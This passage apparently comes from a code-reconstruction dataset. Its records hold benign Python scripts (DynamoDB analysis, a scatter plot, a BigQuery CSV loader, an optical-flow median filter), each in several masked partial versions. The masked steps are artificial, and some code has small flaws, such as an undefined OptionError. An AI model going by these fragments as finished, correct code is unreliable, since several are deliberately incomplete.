global)\n dynamodb_client = boto3.client(\"dynamodb\")\n dynamodb_resource = boto3.resource(\"dynamodb\")\n\n # Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\")\n sys.exit(f\"[ERROR] {e}\")\n\n # Check the 4 tables exist, then get them all\n err_output = \"\"\n table_list = dynamodb_client.list_tables()['TableNames']\n\n print(f\"Existing Tables: {table_list}\")\n\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += f\"Error: Invalid table name 
'{t}' - table does not exist.\\n\"\n \n # Print all tables that did not exist, then exit\n if err_output != \"\":\n print(err_output.strip(\"\\n\"))\n sys.exit(\"ERROR: Terminating program because unable to get table that does not exist.\")\n\n # Get all tables (after checking they exist) (NOTE: these are global)\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n\n # Open the encodings CSV file and read its contents\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, \"r\", newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n\n # if field is var or commodity, set a key-value pair between code and label (in the respective map)\n for row in csv_content:\n if row[2] == \"variable\":\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == \"commodity\":\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n\n # Check args for commodity now, otherwise prompt user\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n # Ask user for commodity\n commodity_input = input(\"Commodity: \").strip()\n \n # Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)\n\n # Check if commodity found a code or None\n print(f\"ENCODING: {commodity_code}\")\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\"ERROR: Terminating program because input does not exist as an encoding commodity code or label.\")\n\n # Init total accumulators for each category\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n\n # iterate through each 
variable and analyze data (if applicable)\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif total_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither\")\n print(f\"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n\")\n\n############################################ FUNCTIONS ############################################\n\n# Converts the label of a dict into its code key, returns None if not a label\ndef convert_dict_label_to_code_key(label, encodings_dict):\n # Get the key of the label if the label exists in the dict as a value\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]\n else:\n return None\n\n# Check if a commodity code + variable is common across all 4 tables, return true if it is\ndef is_common_variable(commodity_code, variable):\n return (has_commodity_and_variable(na_table, commodity_code, variable) and\n has_commodity_and_variable(canada_table, commodity_code, variable) and\n has_commodity_and_variable(usa_table, commodity_code, variable) and\n has_commodity_and_variable(mexico_table, commodity_code, variable))\n\n# Check if a table has data for commodity code + variable (ie. 
scan table), returns true if at least 1 item is found\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(\n FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )\n return response['Count'] > 0\n\n# Retrieves and outputs table data based on commodity and variable and analyze for NA definition\ndef output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):\n # Bring in globals to modify\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # Init local accumulators\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n\n # Print table headers: common variable (for commodity code) across all 4 tables, and table column names\n print(f\"Variable: {variable_encodings_dict[variable]}\")\n print(OUTPUT_FORMAT.format(\"Year\", \"North America\", \"Canada\", \"USA\", \"Mexico\", \"CAN+USA\", \"CAN+USA+MEX\", \"NA Defn\"))\n\n # Retrieve all data, from all years (ie. 
the items from the scan)\n na_scan_data = na_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n can_scan_data = canada_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n usa_scan_data = usa_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n mex_scan_data = mexico_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n\n # Sort each scan data by key\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n\n # Analyze data\n for year in YEAR_RANGE:\n # For each relevant year, calculate total value using multiplication factor\n i = year - 2010\n na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])\n can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])\n usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])\n mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])\n\n # Calc temp sums for the CAN+USA and CAN+USA+MEX columns\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n\n # Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither\n # Note: accumulate the #of accurate NA def 'hits'\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n\n # Print table row for current year\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n\n # Determine the NA definition for this 
variable based on #of 'hits' per year\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif temp_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither\")\n print(f\"Therefore we can conclude North America = {na_defn}\\n\")\n\n # Accumulate global totals using temp local accumulators for NA definition 'hits'\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n# Sorter Helper for queried data by year\ndef data_sort(elem):\n return elem['year']\n\n###################################################################################################\n\nmain()\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
#!/usr/bin/env python
##!/work/local/bin/python
##!/work/local/CDAT/bin/python
import sys,getopt
import matplotlib.pyplot as plt
def read():
x = []
y = []
for line in sys.stdin:
v1,v2 = line.split()[:2]
x.append(float(v1))
y.append(float(v2))
return x,y
#def plot(x,y):
def plot(x,y,xlabel,ylabel,title,fn):
fig = plt.figure( figsize=(6.0,6.0) )
ax = fig.add_subplot(111)
ax.grid(True)
if title:
ax.set_title(title)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plot = ax.scatter( x, y, s=3, marker='o' )
mx = max(x)
mn = min(x)
plot = ax.plot( [mn,mx], [mn,mx] , 'r-')
if fn:
fname = fn
else:
fname = 'TMP_scat.png'
fig.savefig( fname, format='png' )
print 'WROTE --> %s' % fname
######################################
use = '''
Usage: %s
-h help
'''
if __name__ == '__main__':
def usage():
sys.stderr.write(use % sys.argv[0])
sys.exit(1)
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hx:y:o:t:')
except getopt.error:
usage()
fn = ''
x = 'X'
y = 'Y'
title = ''
for (opt,val) in opts:
if opt == '-x':
x = val
elif opt == '-y':
y = val
elif opt == '-t':
title = val
elif opt == '-o':
fn = val
else:
raise OptionError, opt
usage()
#if len(args) != 1:
# usage()
#fn = args[0]
xv,yv = read()
plot(xv,yv,x,y,title,fn)
|
normal
|
{
"blob_id": "b16ad4bae079159da7ef88b61081d7763d4ae9a0",
"index": 8312,
"step-1": "#!/usr/bin/env python\n##!/work/local/bin/python\n##!/work/local/CDAT/bin/python\n\nimport sys,getopt\nimport matplotlib.pyplot as plt\n\n\ndef read():\n\n x = []\n y = []\n for line in sys.stdin:\n v1,v2 = line.split()[:2]\n x.append(float(v1))\n y.append(float(v2))\n return x,y\n\n\n#def plot(x,y):\ndef plot(x,y,xlabel,ylabel,title,fn):\n\n fig = plt.figure( figsize=(6.0,6.0) )\n ax = fig.add_subplot(111)\n ax.grid(True)\n if title:\n ax.set_title(title)\n\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n plot = ax.scatter( x, y, s=3, marker='o' )\n\n mx = max(x)\n mn = min(x)\n plot = ax.plot( [mn,mx], [mn,mx] , 'r-')\n\n if fn:\n fname = fn\n else:\n fname = 'TMP_scat.png'\n fig.savefig( fname, format='png' )\n print 'WROTE --> %s' % fname\n\n\n\n######################################\nuse = '''\nUsage: %s \n\n -h help\n\n'''\nif __name__ == '__main__':\n\n def usage():\n sys.stderr.write(use % sys.argv[0])\n sys.exit(1)\n\n try:\n (opts, args) = getopt.getopt(sys.argv[1:], 'hx:y:o:t:')\n except getopt.error:\n usage()\n\n fn = ''\n x = 'X'\n y = 'Y'\n title = ''\n for (opt,val) in opts:\n if opt == '-x':\n x = val\n elif opt == '-y':\n y = val\n elif opt == '-t':\n title = val\n elif opt == '-o':\n fn = val\n else:\n raise OptionError, opt\n usage()\n\n #if len(args) != 1:\n # usage()\n #fn = args[0]\n\n xv,yv = read()\n plot(xv,yv,x,y,title,fn)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.
SchemaField('first_name', 'STRING'), bigquery.SchemaField(
'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(
'ip_address', 'STRING')]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ
['TABLE']), job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result()
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])
)
print('Loaded {} rows.'.format(destination_table.num_rows))
<|reserved_special_token_1|>
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.
SchemaField('first_name', 'STRING'), bigquery.SchemaField(
'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(
'ip_address', 'STRING')]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ
['TABLE']), job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result()
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])
)
print('Loaded {} rows.'.format(destination_table.num_rows))
<|reserved_special_token_1|>
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [
bigquery.SchemaField('id', 'INTEGER'),
bigquery.SchemaField('first_name', 'STRING'),
bigquery.SchemaField('last_name', 'STRING'),
bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'),
bigquery.SchemaField('ip_address', 'STRING')
]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
# get the URI for uploaded CSV in GCS from 'data'
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
# lets do this
load_job = client.load_table_from_uri(
uri,
dataset_ref.table(os.environ['TABLE']),
job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result() # wait for table load to complete.
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
print('Loaded {} rows.'.format(destination_table.num_rows))
|
flexible
|
{
"blob_id": "01467a4dad3255a99025c347469881a71ffbae7c",
"index": 8179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-3": "import os\nfrom google.cloud import bigquery\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-4": "import os\nfrom google.cloud import bigquery\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [\n bigquery.SchemaField('id', 'INTEGER'),\n bigquery.SchemaField('first_name', 'STRING'),\n bigquery.SchemaField('last_name', 'STRING'),\n bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'),\n bigquery.SchemaField('ip_address', 'STRING')\n ]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n\n # get the URI for uploaded CSV in GCS from 'data'\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n\n # lets do this\n load_job = client.load_table_from_uri(\n uri,\n dataset_ref.table(os.environ['TABLE']),\n job_config=job_config)\n\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n\n load_job.result() # wait for table load to complete.\n print('Job finished.')\n\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))\n print('Loaded {} rows.'.format(destination_table.num_rows))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
<|reserved_special_token_1|>
import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
<|reserved_special_token_1|>
import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,
sigma_distance = 7, sigma_color =7 / 200, filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size+1)
helper_flow_y_list = [0.0] * (helper_list_size+1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
#weigth = math.exp(-exponent) * occlusen_compared / occlusen_current
weigth = math.exp(-exponent+occlusen_compared-occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
# See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING
# 3.13
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1/(2*(weigth_auxiliary / weigth_filter))
for idx_1 in range(n+1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])
result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])
print("result_flow")
print(result_flow.flatten())
return result_flow
|
flexible
|
{
"blob_id": "1748c8dfcc3974b577d7bfacb5cabe4404b696bc",
"index": 612,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = 
flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n",
"step-3": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + 
